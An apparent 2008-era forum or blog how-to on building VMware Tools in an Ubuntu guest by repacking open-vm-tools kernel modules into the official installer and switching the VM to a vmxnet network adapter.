According to Peter Cooper and many other posts out there, there is a problem compiling VMware tools in Ubuntu. So we will follow the workaround using parts of the open source tools.

Install dependency for VMware Tools:

Code:

sudo apt-get install build-essential linux-headers-$(uname -r) psmisc
sudo apt-get install gcc binutils make wget

And for the hack with the open tools I also installed the following (although some of these were found on sites describing what’s needed for Ubuntu with a GUI, some might be unnecessary):

Code:

sudo apt-get install libgtk2.0-dev
sudo apt-get install libproc-dev libdumbnet-dev xorg-dev
cd /tmp
sudo mkdir liburiparser
cd liburiparser
sudo wget http://ftp.ie.debian.org/debian/pool/main/u/uriparser/liburiparser1_0.7.2-0exp1_amd64.deb
sudo wget http://ftp.ie.debian.org/debian/pool/main/u/uriparser/liburiparser-dev_0.7.2-0exp1_amd64.deb
sudo dpkg -i liburiparser1_0.7.2-0exp1_amd64.deb
sudo dpkg -i liburiparser-dev_0.7.2-0exp1_amd64.deb
sudo apt-get install libicu-dev

Go to /tmp and download the open source version of the tools from here.

Code:

.tar.gz?modtime=1227030450&big_mirror=0

Unpack and build the open-vm-tools:

Code:

sudo tar xzvf open-vm-tools*.gz
cd open-vm-tools-2008.11.18-130226
sudo ./configure --includedir=/usr/include/uriparser
sudo make

In the VMware management console, right click on the VM and tell VMware to install the VM tools then copy the tools:

Code:

sudo mount /media/cdrom0
sudo cp -a /media/cdrom0/VMwareTools*.gz /tmp/
cd /tmp/
sudo tar -xzvf VMwareTools*.gz

From the open source modules/linux folder we have the vmblock, vmhgfs, vmmemctl, vmsync and vmxnet modules that we need to tar up and place into the official VMware tools tarball:

Code:

cd /tmp/open-vm-tools-2008.11.18-130226/modules/linux/
for i in *; do sudo mv ${i} ${i}-only; sudo tar -cf ${i}.tar ${i}-only; done
cd ../../..
sudo mv -f open-vm-tools-2008.11.18-130226/modules/linux/*.tar vmware-tools-distrib/lib/modules/source/
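
If you want to see what the rename-and-tar loop produces before running it against the real module sources, you can exercise the same step on throwaway dummy directories in a temp dir (the directory names below are just stand-ins):

```shell
# Demonstrate the rename-and-tar step on dummy module directories
demo=$(mktemp -d)
cd "$demo"
mkdir vmblock vmxnet            # stand-ins for the real module folders

for i in *; do
    mv "$i" "$i-only"           # rename dir to <module>-only
    tar -cf "$i.tar" "$i-only"  # pack it up as <module>.tar
done

ls "$demo"   # shows vmblock-only, vmblock.tar, vmxnet-only, vmxnet.tar
```

The resulting `<module>.tar` files are what the official installer expects to find in lib/modules/source/.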

Now we can run the regular VMware tools installer accepting all the defaults:

Code:

cd /tmp/vmware-tools-distrib/
sudo ./vmware-install.pl

Activate the vmxnet drivers:

Code:

sudo /etc/init.d/networking stop
sudo depmod -a
sudo modprobe vmxnet 
sudo /etc/init.d/networking start

Shut down with sudo:

Code:

init 0

and in the management console edit the VM settings, delete the network adapter that was previously created, and create a new one of the vmxnet type.
Start the VM, and this step should be complete.